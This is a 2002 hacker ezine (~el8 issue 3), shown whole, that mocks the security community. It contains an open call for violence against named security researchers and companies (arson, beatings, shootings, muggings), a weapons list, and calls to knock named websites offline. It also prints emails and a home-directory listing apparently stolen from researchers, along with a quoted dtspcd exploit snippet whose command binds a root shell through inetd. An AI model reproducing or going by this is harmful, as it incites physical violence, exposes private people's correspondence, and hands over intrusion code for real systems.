2 August 2002 Source: http://www.eurocompton.net/~fuk/el8.3.txt ----------------------------------------------- #!/bin/sh ################################################ ## the gr8zt ez1ne t0 evr gr4ce this pl4ce. ## ## ---------------------------------------- ## ## IF YOU ALTER ANY PART OF THIS EZINE YOU ## ## WILL BE OWNED, RM'D, AND PUT IN NEXT ISSUE ## ## ------------------------------------------ ## ## IF YOU ALTER ANY PART OF THIS EZINE YOU ## ## WILL BE OWNED, RM'D, AND PUT IN NEXT ISSUE ## ## ------------------------------------------ ## ## IF YOU ALTER ANY PART OF THIS EZINE YOU ## ## WILL BE OWNED, RM'D, AND PUT IN NEXT ISSUE ## ## ------------------------------------------ ## ## the gr8zt ez1ne t0 evr gr4ce this pl4ce. ## ################################################ ##::::::::::::::::::::::::::::::::::::::::::::## ##:'####::::::'########:'##::::::::'#######:::## ##'## ##:'##: ##.....:: ##:::::::'##.... ##::## ##..::. ####:: ##::::::: ##::::::: ##:::: ##::## ##:::::....::: ######::: ##:::::::: #######:::## ##:::::::::::: ##...:::: ##:::::::'##.... ##::## ##:::::::::::: ##::::::: ##::::::: ##:::: ##::## ##:::~el8[3]:: ########: ########:. #######:::## ##::::::::::::........::........:::.......::::## ################################################ ## the definitive src for the Porno H/P Scene ## ################################################ ## do "sh " to extract eldump.c ## ## compile eldump.c and use it to extract ## ## the rest of the w4r3z: ## ## $ ./eldump el8.3.txt -vvv ## ## <*> whitehated.topcities.com ## ## <*> ftp.uu.net/tmp/EL8MAGAZINEDONTDELETE ## ## <*> keyword "~el8" on aol.com ## ## <*> www.textfiles.com/~el8 ## ## <*> nipc.gov/~el8 ## ## <*> www.fedworld.gov/0day/~el8 ## ## <*> www.fbi.gov/top10mostwanted/~el8 ## ## <*> www.securityfocus.com/weareowned.txt ## ## <*> www.incidents.org/~el8 ## ## <*> www.whitehats.com/weareowned.txt ## ## <*> www.blackhat.com/plzdonthurtus.txt ## ################################################ ## where have all the 0dayz g0neeeeeeeeeeeee! ## ################################################ cat <<'-+-+'> /dev/null [BOI] [BEGIN_DIR] articles .~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~. |#$%$#@%!$@^%@$^!@#@#%!@#$^@!$#^%!@$#$%@!#$%^!@$^%#$^!@$%@#@^$#!@#| |#:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::#| |#::'####::::::'########:'##::::::::'#######::'##:'#######:'##:::#| |#:'## ##:'##: ##.....:: ##:::::::'##.... ##: #::...... #:: #:::#| |#:..::. ####:: ##::::::: ##::::::: ##:::: ##: #:::::::: #:: #:::#| |#::::::....::: ######::: ##:::::::: #######:: #::: ######:: #:::#| |#::::::::::::: ##...:::: ##:::::::'##.... ##: #:::..... #:: #:::#| |#::::::::::::: ##::::::: ##::::::: ##:::: ##: #:::::::: #:: #:::#| |#::::::::::::: ########: ########:. #######:: ##: #######: ##:::#| |#:::::::::::::........::........:::.......:::..::.......::..::::#| |#:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::#| |#@#$!@%$^%@!$#%$@%^#!^$#@^%!@%#%!@#^$%@!^$#$^!@$^#$^^%@%@#!@#!@$#| |#:::::::::::::::::FUCKN UP WHITEHATS SINCE 1998:::::::::::::::::#| |#@#$!@%$^%@!$#%$@%^#!^$#@^%!@%#%!@#^$%@!^$#$^!@$^#$^^%@%@#!@#!@$#| `~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~#:._.:#~' ,-._,-._ .----------------------------------. _,-\ o O_/; | OpenBSD! The proactively secure | / , ` `| | operating system! ... | | \-.,___, / ` | FOR ME TO PISS ON! | \ `-.__/ / ,.\ `----------------------------------' / `-.__.-\` ./ \' / /| ___\ ,/ `\ ( ( |.-"` '/\ \ ` \ \/ ,, | \ _ \| o/o / \. \ , / / ( __`;-;'__`) \\ `//'` `||` `\ _// || ; .-"-._,(__) .(__).-""-. ` / \ / \ ' \ / \ / ` `'-------` `--------'` ; 11:46PM up 2 days, 6:25, 22 users, load averages: 0.47, 0.27, 0.20 USER TTY FROM LOGIN@ IDLE WHAT deraadt C0 - Wed05PM 5:57 emacs -nw -u deraadt -f zenicb mickey p0 versalo.lucifier Wed07PM 15 icb -n mickey -g hackers -s cvs millert p1 millert-gw.cs.co 3:37PM 2:48 tail -fn-100 /cvs/CVSROOT/ChangeLog deraadt p2 v.openbsd.org Thu11PM 1:06 -csh form p3 vell.nsc.ru Thu11PM 21:29 less /cvs/CVSROOT/ChangeLog pvalchev p4 dsl-dt-207-34-11 Thu05PM 15 tail -fn-50 /home/hack/pvalchev/chan deraadt p5 zeus.theos.com Wed05PM 0 systat vm 1 deraadt p6 zeus.theos.com Wed05PM 2days tail -f /cvs/CVSROOT/ChangeLog deraadt p7 zeus.theos.com Wed05PM 3 -csh deraadt p8 zeus.theos.com Wed05PM 3 gv scanssh.ps deraadt p9 zeus.theos.com Wed05PM 1:26 emacs -nw -u deraadt -f mh-rmail deraadt pa zeus.theos.com Wed05PM 16 less machdep.c deraadt pb zeus.theos.com Wed05PM 16 -csh deraadt pc zeus.theos.com Wed05PM 5:57 -csh angelos pd coredump.cs.colu Thu02PM 2:48 icb -g hackers -h localhost -n angel deraadt pe zeus.theos.com Wed05PM 2:29 -csh provos pf ssh-mapper.citi. Wed05PM 27:21 tail -f I_AM_A_LUSER_AND_A_MORON brad q0 speedy.comstyle. Wed06PM 28:27 tail -f /cvs/CVSROOT/ChangeLog aaron q1 nic-131-c68-101. 8:43AM 15 icb -scvs -ghackers lebel q2 modemcable093.15 Thu09PM 2:48 -bash wvdputte q3 reptile.rug.ac.b 5:45AM 12:56 tail -f 2001-09 jason q4 24-168-200-128.w Thu08AM 1day -ksh deraadt q5 hackphreak.org 4:20AM 0 w ~el8 is dope. kool-rad k-fat badassezinenodoubt ~el8 is dope. kool-fresh k-hip shit shit ~el8 is dope. k-hip k-kul elite elite ~el8 is dope. bad ass badaz eliteasshitaselite ~el8 is dope. k-hip fuck!. elite elite ~el8 is dope. kool-fresh ~el8!roxroxrox shit shit ~el8 is dope. kool-rad koolhipawesome badassezinenodoubt .----------------------------------------------------------------. ; t4ble of h0ly w4r3z & bey0nd ; ; `------------------------------' ; ; *00* ~e~ intr0duktion ; ; *01* ~e~ pr0jekt m4yh3m ; ; *02* ~e~ Know Your WhiteHat Enemy ; ; *03* ~e~ zeroday screen exploit ; ; *04* ~e~ lyfestylez of the owned and lamest with pm ; ; *05* ~e~ muz1k in the undergr0und ; ; *06* ~e~ defacements of the milenium ; ; *07* ~e~ ~el8 hitlist tools ; ; *08* ~e~ bronc buster busted ; ; *09* ~e~ lcamtuff helps ~el8 ; ; *10* ~e~ lyfestylez of the owned and lamest with jobe ; ; *11* ~e~ phrack staff demystified ; ; *12* ~e~ gobble blaster ; ; *13* ~e~ 1nterv1ew with te4m OG ; ; *14* ~e~ lyfestylez of the owned and lamest with aempirei ; ; *15* ~e~ chapter sixteen ; ; *16* ~e~ ELDUMP & ELTAG ~el8 ez1ne t00lz ; `----------------------------------------------------------------' .----------------------------------------------------------------. ; t4ble of ~el8 m3mbrZ ; ; `----------------------' ; ; SiLLY G00S3 -> THe HiGH PReeZT ; ; FuNNY BuNNY -> a BLiP oN YOuR GaYDaR ; ; ODaY MaZTeR -> GeTZ aLL THe HoEZ and CoDEz ; ; ENRiCO -> INSaNe IN ThE MeMBRAiN ; ; ReDPUBeZ -> AkA KARRoT_BoTToM ; ; CaWCaW -> EYe'LL TEaR YoUR EyEZ OuT ; ; KRaD -> sO FReSH & sO CLEaN ; ; PoOtIeTaNG -> CRaZY CooL FRe$h ; ; UNCLe MaViS -> HaS YOu IN A HEaDLoK ; ; TcJ -> ThE CRiMiNaL JESuS ; ; CLiFF SToLE -> CLiFF SToLE YOUR CoDEz ; ; JaMeS BRoWN PaNTZ -> STAiNeD UNDeRWaREZ ; ; JoHNY SiX ToEZ -> MuTaTED MiKE ; ; DiNOSaUR MaN -> THe OLD SCHooL ; ; MiKE TySoN -> THe DaHMeR oF BoXiNG ; ; BaLLSaCK -> Mr HuGE NuTZ ; ; ARaB BiLL -> MeKKa DoN WoN ; ; KaRELeSS KaRL -> EyE DoNT WiPE LoGZ ; ; OSaMA BiN LaDEN -> GeORgE BuSH ; ; ThE UNiX TeRRoRiZt -> RM'z YoUR BoX WiTHOuT ReMORsE ; ; PuSSy FaCEd KiLLa -> GHoST FaCE KiLLaZ HoMEsLiCE ; ; CHiNeeZ TiMMy -> CReAM oF SuM YuN GaI ; ; SeXPaTRiOT -> THe PoRNo HaCKeR ; ; T z D -> TEaM ZeRODaY ; `----------------------------------------------------------------' .~e~----------------------------------------------------------~e~. ; *00* intr0duktion -- ~el8 TEaM ; `----------------------------------------------------------------' ~el8 c0uld f1ll this ez1ne with s0 much shyt but we'd lyke to release 0ver 150 issuez, s0 st4y tun3d. n0 intr0 n33ded. we r the h4rdkore h4krz who clean your toilets, the h4rdkore k0derz who forcefully w1pe y0ur wind0wz @ st0pl1ghtz and intersekti0nz, the h4rdk0re phre4krZ who mow your l4wn, the h4rdk0re cr4krz who ste4l cl0thez from the salvati0n army, we take yor orderz at burger k1ng, we steal yor hubk4pz, we even put k4meraz in port `o pottiez. *_DO_* *_NOT_* *_FUCK_* *_WITH_* *_US_*. ~el8 .~e~----------------------------------------------------------~e~. ; *01* pr0jekt m4yh3m -- ~el8 ; `----------------------------------------------------------------' w1th such h1gh figurez in the sekurity scene being 0wn3d and humili4ted, eye h4ve t0 s4y that pr0jekt m4yhem has been a succ3ss. ~el8 kn0wz of at le4st 153 DEDICATED FOLLOWERZ to the cause. th3r3 is of course, many others who believe. pr0j3kt M4yh3m cellz oper8 ind3p3ndent of each 0ther. w3 have in fact cre4t3d an army. w3 w1ll n0w n4me a very sm4ll porti0n of pr0j3kt m4yh3m'z victims (th3r3 ar3 0th3rz muwhaah4hahah): k2, dugsong, lance spitcock, horizon, Chris Spencer, provos, Toby Miller, Al Hugher, ISS, NAI, QUALYS, EEYE, deraadt, route, @stake, Brian McWilliams, spaf, zip, TESO, ADM, w00w00, HERT, BVIEW, 0k th1s l1st c4n g0 0n and 0n but w3 d0nt w4nt t0 w4ste it all in 0ne ez1ne. whY be t4rg3t3d by us wh3n y0u can j0in us. why p0st info, codes, or bugs wh3n the end result iz y0ur ent1re syst3m, f4mily, and friends being 0wn3d t0 mega-fuck. d0eznt it l00k like more phun to be a bl4ckhat than a wh1tehat (th3r3 iz no inbetween). w1th that being said, pr0j3kt mayh3m has been br0ught t0 a n3w l3vel. n0 l0nger do we w4nt YOU OUR LOYAL FOLLOWERS to simplY 0wn s3kurity fucks wh0 st3p 0n 0ur turph. w3 w4nt y0u t0 cause w0rldw1de physical destructi0n to the sekurity industry infrastructure. but plz c0ntinue t0 d0 a g00d j0b 0n the internet p0rti0n of projekt m4yhem. h3re is h0w this can be accomplished: ------------------------------------' * g0ing t0 defk0n or blackhat? initiat3 a n4palm stryke. BURN THE M0THERFUCK3R D0WN. bre4k s0me computers. beat the fuck 0ut 0f the whitehat puss1ez wh0 attend or g1ve spe3chez. th1s can be done very easily with the us3 of gas0line and or baseball bats. th1s meth0d applies at all security/"h4ker" cons. * loc8d near a security company? sh00t ISS employeez with a paintball gun (y0u c4n us3 h1gh p0wer3d r1fl3z but iph y0u g3t caught ur in f0r lyfe, s0 use p4intball gunz f0r wh3n you are released you c4n c0ntinue y0ur missions). th1s meth0d appliez t0 all sekurity companies loc8d near y0u. h0wever, iph y0u w1sh t0 m4ke your MECCA pilgramag3 to ISS HQ in ATLANTA, th3n thats f1ne by us. * loc8d near a whitehat security d00d? g1ve em` a g00d mugging. thre4ten them that if they c0ntinue in th1s m4nner, y0u w1ll s1lence th3m f0rever. th1s meth0d w0rk3d in f0rc1ng hugh3r d0wn fr0m his p0sition as bugtraq m0derat0r. th1s meth0d also appliez f0r peo0ple wh0 wr1te f0r phr4ck and the like. * sp3cial m3th0d, see a pers0n wear1ng s0me sort of "r00t" clothing, be4t the fuck 0ut 0f them. * special meth0d for missi0n #1 th4t st1ll n33dz t0 be accomplish3d: DoS'n of maj0r sekurity websites. l3tz t4ke 0ut securityfocus, neohapsis, google, incidents, packetstorm, and the lyke. f0ll0werz of ~el8 muzt d0wn th3se s1tez 4ever. w3 w1ll shut them d0wn, and th3y w1ll b0w t0 us. 0ther s1tez w0rth d0wning: freshmeat, slashdot, hackphreak, blackhat, defcon, cnn, infonexus, packetfactory... ~el8's pr0jekt m4yhem sw1ss armY kn1fe: --------------------------------------' * w1re kutterz / metal kutters * HERF gun * spr4y p4int * l1ghter fluid (or diesel fuel) * p4ck of matchez * one bick lighter * some s0rt of face mask (one roll of panty hose) * a backpack * handkuff keys in the heel of your sne4kerz * one smoke bomb and or hand grenade * one rambo knife * one hidden thumb tack * one digital camera to record recruiting material for the el8: -----------' * one taser / stun gun * one bazooka * one ak-47 or m-16 * one police scanner * a pack of big chew bubble gum * and one flame thrower m1ssi0n 0n3 of pr0jekt m4yhem has b33n acc0mplizhed, and must c0ntinue in itz 0n g0ing eff0rt t0 0wn the sekurity / whitehat scene. m1ssi0n tw0 is actu4lly easi3r t0 acc0mpl1sh, s0 l3tz g3t th1s 0ne r0ll1ng. th3 w4r h4z been decl4red, the w4r has been initiated, th3 w4r iz being w0n. -- ~el8 tEaM .~e~----------------------------------------------------------~e~. ; *02* Know Your WhiteHat Enemy -- odaymaztr ; `----------------------------------------------------------------' Know Your WhiteHat Enemy - odaymaztr ------------------------------------ many of you may have heard of this great new project called 'the honeynet project', aimed at getting a firsthand look at the blackhat hacker mindset and to share the lessons learned. at first glance, you blackhats may think 'oh n0!@# im screwed !@# these whitehats with their 'modified to log' sh binarys are getting so so tricky!@#'. at first it may have seemed a little threatening, but after looking over their whitepapers, apprehension quickly turned to laughter. we were also a little confused when we noticed that evil ADM guys such as 'K2' were part of this whitehat organization. so we decide to investigate ... $ id uid=100(ktwo) gid=100(users) groups=100(users) $ pwd /export/home/ktwo $ ls -al drwxr-x--x 16 ktwo users 4096 . drwxr-xr-x 8 root root 4096 .. drwx------ 3 ktwo users 4096 .BitchX -rw-r--r-- 1 ktwo users 0 .addressbook -rw------- 1 ktwo users 2285 .addressbook.lu -rw-r--r-- 1 ktwo users 1289 .admirc -rw------- 1 ktwo users 5194 .bash_history -rw-r--r-- 1 ktwo users 82 .bashrc drwx------ 2 ktwo users 4096 .gnupg -rw-r--r-- 1 ktwo users 34 .less -rw-r--r-- 1 ktwo users 114 .lessrc drwxr-xr-x 2 ktwo users 4096 .ncftp -rw------- 1 ktwo users 14498 .pinerc lrwxrwxrwx 1 ktwo users 7 .profile -> .bashrc -rw-r--r-- 1 ktwo users 5 .qmail-default drwx------ 2 ktwo users 4096 .screen -rw-r--r-- 1 ktwo users 3394 .screenrc drwx------ 2 ktwo users 4096 .ssh drwxr-xr-x 3 ktwo users 4096 .ssh2 -rw-r--r-- 1 ktwo users 257118 02-03-06 CORE_IMPACT.pdf -rw-r--r-- 1 ktwo users 211975 194_HPYN2E_te_16.ZIP -rw-r--r-- 1 ktwo users 3281174 194_HPYN2E_te_16.doc -rw-r--r-- 1 ktwo users 71145 admirc-0103090536.tgz drwxr-xr-x 10 ktwo users 4096 admirc1 -rw-r--r-- 1 ktwo users 12091 apache-iss.tgz.pgp -rw-r--r-- 1 ktwo users 3830 attn.tar.gz -rw-r--r-- 1 ktwo users 7782 authorbio_instructions.zip -rw-r--r-- 1 ktwo users 1827 beto.asc drwxr-xr-x 2 ktwo users 4096 bin -rw-r--r-- 1 ktwo users 32840 caddis-dtspcd.c -rw-r--r-- 1 ktwo users 9810 caddis-radius.c -rw-r--r-- 1 ktwo users 1384 caddis.key -rw------- 1 ktwo users 264 dead.letter drwxr-xr-x 6 ktwo users 4096 dl -rw-r--r-- 1 ktwo users 69408 dtscp.tgz drwxr-x--- 3 ktwo users 4096 dtspc -rw-r--r-- 1 ktwo users 27150 dtspcd-8.6.tgz -rw-r--r-- 1 ktwo users 4833 exploit.html -rw-r--r-- 1 ktwo users 3008 gpg-pubkey.asc drwxr-xr-x 2 ktwo users 4096 ida -rw-r--r-- 1 ktwo users 4535 ihack.c -rw-r--r-- 1 ktwo users 7710 infect.tar.gz -rw-r--r-- 1 ktwo users 47765 irc.txt -rw-r--r-- 1 ktwo users 2268 job -rw-r--r-- 1 ktwo root 188416 list.mdb drwx------ 2 ktwo users 4096 mail -rw------- 1 ktwo users 35331378 mbox -rw-r--r-- 1 ktwo users 912 msg -rw-r--r-- 1 ktwo users 1642 msg.asc -rw-r--r-- 1 ktwo users 3008 new-pub.asc -rw-r--r-- 1 ktwo users 1720 noir -rw-r--r-- 1 ktwo users 1634 pubkey.pgp -rw-r--r-- 1 ktwo users 3824 solar-atach -rw-r--r-- 1 ktwo users 2064 solar-msg -rw-r--r-- 1 ktwo users 12 solar-msg.asc -rw-r--r-- 1 ktwo users 177 suid -rw-r--r-- 1 ktwo users 43 super drwxr-xr-x 3 ktwo users 4096 tmp -rw-r--r-- 1 ktwo users 19668 ttdb.c after exploring all his shells (zolo rulez dewD!!#), the ~el8 investigative unit decided to search his email for clues... (J4n3 and D1ck used in some cases to protect the innocent!) %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: Lance Spitzner To: K2 Subject: Re: dtspcd exploit obtained (fwd) Your buddy interested in chatting with the MITRE folks? Alot of people are very impresses with his exploit :) -- Lance Spitzner http://project.honeynet.org ---------- Forwarded message ---------- From: J4ne To: Lance Spitzner Subject: Re: dtspcd exploit obtained I went to the apparent authors website. It hardly mentions an interest in secur ity, but it does look like he used to teach at the University of Central Michigan http://jdrake.qoop.org/art/ has some pictures of him. Are you familiar with thi s person at all? I'm wondering if he didn't write this code to teach someone else and then that p erson started distributing it. This guy looks like he knows his stuff and not strippi ng the symbols doesn't seem to fit with that. J4n3 Lance Spitzner wrote: > J4n3 wrote: > > > It was very nice of the author to include his name and email :). I was look ing > > at the strings output and it looks like the author took a lot of time to do error > > checking and write one of the better usage statements i've seen. I also did n't > > notice a single misspelling and no script kiddish text at first glance. To me > > that says a few things about the author. Is this typical of what you see in > > exploit code? Most of the stuff i've seen in public postings is nowhere nea r > > this clean. > > Its extremely well written, and powerful. Definitely not our > typical exploit :) > > lance note: mitre has elite modified strings binary to see if author has done proper error checking (very kewl!!!) note: use strip on binarys to confuze forensic analysis!! %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: Lance Spitzner To: K2 Subject: Re: dtspcd exploit obtained (fwd) K2 wrote: > I'll ask him Dude, this is not a big deal. Just a lot of people interested in his exploit code, its more impressive then most. NSA and FBI even asked me for a copy. :) lance note: kn0ck kn0ck eff-bee-eye stiq em up script kid! %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: Lance Spitzner To: D1ck Song , "'D1ck Ruiu'" , K2 , J4ne Roesch Subject: For Project, OBSD on Sun or Intel? Gents, Seeing as how you are respected OpenBSD guru's, AND members of the Project, wanted to throw this question at you. Looks like we might get an OC12 and hardware donated to the Project, specifically for our internal and external webserver and project Infrastructure. We will be standardizing on OpenBSD. Since we have our choice of software, is there any security value add installing OpenBSD on Sparc, or is Intel fine? My line of thinking is the non-Intel architecture would help defeat some exploit code. Or am I just wasting time and making life harder with OpenBSD on Sparc? Thanks! -- Lance Spitzner http://project.honeynet.org note: yeah ur wastin ur time bro, we'd own u even if u installed netbsd on ur xbox. %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: "D1ck H. Rowland" To: "J4ne Hines" , Subject: RE: DTSPCD Exploit > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 >=20 > Hey all, I've had several Solaris honeypots compromised where 2 files > (kcsun and antisun) binaries were uploaded, used and than deleted. > Does anyone by any chance (Lance?) know if these are the filenames > for the highly searched for DTSPCD exploit? If not, has anyone whose > honeypots been compromised seen these files downloaded to their box > for use before? >=20 > Can't pull up anything on these filenames at Google. Please advise. On a similar note, has anyone tried putting append-only flags on the = target directories to keep the people from removing these files? I'm = looking for anyone with experience in using append-only *directories* on = honeypots (not just append-only logs). There does not appear to be any = references talking about using this technique from what I've seen. Yeah I already know the arguments: "Immutable flags can be bypassed by a = knowledgeable attacker..." I suppose the real question is how many = people are going to stick around once they found out they're effectively = hacking a system with a WORM drive (I suspect not many). Additionally, I = would like to tie a measure like this to some type of system timer = (external or otherwise) that will shut down the connection after X = minutes have elapsed of intruder activity. This could help catch them in = midway through the panicking process and could lead to some interesting = results.=20 Thanks, -- D1ck note: i thought rm'd binarys were not a problem for u forensic experts! %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: D1ck Eckholt Subject: Re: ADMmutate Hey, I am not @ honme for another week, but if you want too look into it I supply a paper and some demonstration exploits and vulnerabilities in http://www.ktwo.ca/c/ADMmutate-0.8.4.tar.gz I do my testing against snort or RealSecure works good :) Later, K2 D1ck Eckholt wrote: > hello to canada ;-) > > first at all, sorry for my bad english, but i'll try my very best. > i am a german student and i want to make an short presentation > about your "ADMmutate" tool. i need a little support for doing > that and so i hope, you can help me: > > 1.) which software (network IDS) is the best for a simple test ? > my unix/linux skills are not the best, so i would prefer a IDS > (maybe an older one) for windows NT. > 2.) do you have or know a sourcecode of a simple buffer-overflow > exploit, which can be used with your tool in a presentation ? > 3.) do you know good links where a can go deeper into this topic ? > > so i hope, you have time to help me with my stupid questions, but > i am very interested in this work and i am standing just at the beginning... > > thanks and greetings from germany > > D1ck eckholt > %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: J4ne Oon cc: 'D1ck Ruiu' Subject: Re: Security Consulting Opportunity James: Lance had copied Dragos and myself on this message. We are based in Vancouver, BC Canada and have quite a bit of experience doing network penetration assessments. Dragos has over a decade in the network security field and has been closely tied with the IDS community for some time as well. We are both currently members of the Honeynet Project and have developed our skills over a long period of detailed technical study and review. As both of us are out of town until December 10 working on other client engagements, could you give us a bit more detailed explanation of the size and scope of the assessments and reviews you would like conducted. Information as too weather or not you would need a local presence and the estimated duration of this project. Thank you. K2 Lance Spitzner wrote: > James Oon wrote: > > James, I'm afraid I'm unable to commit to this, however I > have copied to experts in this field, they may be able to > help you out. > > Thanks! > > > G'day Lance, > > > > My name is James Oon, and I was with Sun Microsystems Professional > > Services > > based in Singapore from 1995 to 2000. I have left since for a > > consulting company > > called BEENET. > > > > Anyway, the purpose of the email is to to enquire regarding your > > interest to do a > > security audit for stock exchange. The job is to perform a > > penetration test and > > security review. Problem is that some of the machine is on S/390 > > (especially the > > backend). We are willing to pay a handsome sum for the job. > > > > Please email me back if you are interested or if you know someone > > else who is > > interested. > > > > Many thanks. > > > > Regards > > James Oon > > > > -- > Lance Spitzner > http://project.honeynet.org %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: D1ck f4ce Subject: Re: virus (err.. cansecwest) Elite!!! I spoke with dragos and he thinks it'd be an awesome addtion too the conf. Sure man, just prep a powerpoint show for the conf or something or however you wanna give a talk. Give dragos a showt (dr@kyx.net) or msg him on IRC, i finally got his ass to show up pretty consistantly in #!w00w00 (usually nik dr or something) I think he's mesg'ng you now but I think it's late over there... Let me know how it all goes, I thnk it'd be fun to finally get together ;) We'll be partieng hardcorein Vancouver man :) K2 %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Catherine Nolan Subject: Re: Hack Proofing Your Network, Second Edition Hi Catherine: Sounds like an interesting proposition, could you send me the outline and the list of open chapters in case anything else sparks my interest? Also would it be possiable to see a copy of the first edition so I could get an idea of the writing style of the rest of the book. I'm out of town until Monday so please forgive the poor spelling in this email (no access too a good email client when I am remote). Thanks and I look forward to hearing from you, K2 Catherine Nolan wrote: > Hello K2 - > > Please allow me to introduce myself as the acquisitions editor for Syngress > Publishing, my name is Catherine Nolan. > > Your name was forwarded to me by Ryan Russell as a potential author for the > second edition of his book Hack Proofing Your Network: Internet Tradecraft. > In particular Ryan has recommended you for the chapter on IDS Evasion. > > You would be joining the esteemed authoring team already in place consisting > of Kingpin, RSnake, Rain Forest Puppy, Dan Kaminsky, Ryan Permeah, Hal > Flynn, Marc Maiffret (?), and of course Ryan Russell. > > I have an outline available for the topics to be covered in this chapter, if > you are interested in reviewing it please contact me at your earliest > convenience. Also, this chapter is available in the first editon. > > If this topic is not of interest, but you are interested in contributing let > me know and I'll forward you a list of the other open chapters. > > We are currently offering $18/ per manuscript page as compensation for this > chapter. We would expect that the new chapter could be delivered in one > month's time. > > I look forward to hearing from you regarding this matter. > > Thank you in advance for your cooperation, > Catherine > Catherine B. Nolan > Acquisitions Editor > catherine@syngress.com > 781-681-5151 ext 18 > > Syngress Publishing > 800 Hingham Street > Rockland, MA 02370 > http://www.syngress.com note: ~el8 will sabotage Hack Proofing Your Network II %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Ryan "D1ck sucking" Russell Subject: Re: book... CHP 16 IDS Evasion Ryan Russell wrote: > Excellent. Just to confirm, which chapter do they have you working on? > > Ryan > > K2 wrote: > > > Hey Ryan, how's it goin? Thanks for the opertunity in working on your > > book, it seems like a pretty cool group. I'm spending some time working > > out my draft for next week. I'll probably demo against snort and > > RealSecure. Hope it's all going well. > > > > Thanks, > > K2 %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: Subject: Hailstorm Ryan, I Know you said to use Hailstorm as an example of some packey level evasions, but I believe clicktosecure.com is down and I cannot find much literature about this product. Do you have anything that I could look at? I am going to go on about dugsongs fragrouter and horizons Defeating Sniffers and Intrusion Detection Systems phrack paper that included congestant.c note: k2, the click and point specialist %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: "Jennifer 8. Lee" Subject: RE: APCO? Just some work with the honeynet, developing some code and tools for use in a few applications. Real life work is pretty demanding right now, allthough I am trying to find openings in the US. I want to be closer to some family. TTYL, K2 Jennifer 8. Lee wrote: > > okay. how are you doing? are you working on something interesting? %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: J4ne Nolan Subject: RE: Chapter Here you go... Hope there arent too many bugs, visio died on me so I had to dump one of the diaagrams. K2 Catherine Nolan wrote: > Sure....I'm usually okay with extending dates a day or so. I'll look > forward to reviewing your chapter first thing tomorrow morning. > > C > > Catherine B. Nolan > Acquisitions Editor > catherine@syngress.com > 781-681-5151 ext 18 > > Syngress Publishing > 800 Hingham Street > Rockland, MA 02370 > http://www.syngress.com > > -----Original Message----- > From: K2 [mailto:ktwo@ktwo.ca] > To: Catherine Nolan > Subject: Re: Chapter Delivery Reminder > > Catherine, can you actually give me until the end of day Monday (eg. > 8pm) I am going to be travelling all day and will not have net acess > until then. > > Thanks, > K2 > > Catherine Nolan wrote: > > > Hi Guys - > > I'd like to remind you all that your completed first drafts of your > chapters > > will be due this coming Monday. I would prefer that they be submitted to > me > > during working hours. I can't tell you how many people think Monday means > > Tuesday....because they submit their work at 11:20 PM. > > > > I hope that this will help you plan your weekends accordingly. > > > > Thank you all for your hard work thus far - keep it up! > > > > Best, > > Catherine > > Catherine B. Nolan > > Acquisitions Editor > > catherine@syngress.com > > 781-681-5151 ext 18 > > > > Syngress Publishing > > 800 Hingham Street > > Rockland, MA 02370 > > http://www.syngress.com %-k2-%-spec-%-tac-%-u-%-lar-%-k2-%-spec-%-tac-%-u-%-lar-~el8-% From: K2 To: J4ne Spitzner Subject: Re: dtspc attack Hey Lance, This version of the dtspcd exploit has been out for quite some time. at least 3 months, it's the same version Ihave. Do you know what signature it set off from snort? The guy that wrote it put in some passwords for binaires that would be distributed, so unfortuntatly some kiddies probably got it and are running it all over the 'net :( Anything inperticular you want to know about it? Take care, K2 Here are some snippets from the comments from my copy.. (I origianally found this vuln in '99;) storm:/tmp/dtspcd/src# cat defs.h ... /* inetd shell using above service w/passive success checking and cleanup */ #define DEFAULT_CMD \ "echo \"" /* service here */ " stream tcp nowait root /bin/sh sh -i\">/tmp/x;" \ "/usr/sbin/inetd -s /tmp/x;" \ "sleep 10;" \ "/bin/rm -f /tmp/x "; #define SUCCESS_CMD \ "uname -a;ls -l /core /var/dt/tmp/DTSPCD.log;" \ "PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/usr/ccs/bin:/usr/gnu/bin;" \ "export PATH;echo \"BD PID(s): \"`ps -fed|grep ' -s /tmp/x'|grep -v grep|awk '{print $2}'`\n" .... storm:/tmp/dtspcd/src# cat dtspcd_ex.c * What does it do? * * 1. remotely and silently gets the equivalent of: * sh$ uname -nsrm * 2. remotely and silently confirms or denies the * existence of arbitrary user names. * 3. remotely and somewhat silently obtain administrator * privileges on the machine. * * FEATURES: * i. ability to completely generate a target via command line * parameters. * ii. automatically detects which built-in target to use. * iii. command line options override target settings. * iv. cidr block scanning with CFLAGS='-DALLOW_CIDR -lm' * v. option to read targets from a file * vi. ability to brute force the target using -b * vii. several different exploitation methods * iix. optional password checking for binary release * ix. passive success checking using sleep shell command * x. tries multiple offsets automatically... * * PLANNED: (personal notes) * - maybe do other OS's (AIX, OSF1) * - eliminate nops.. * * NOTE: this program logs nothing unless dtspcd is ran with * -debug option. * * With use #3, worst cases are: * a. /core created :( * b. they had -debug on and they logged some information to * 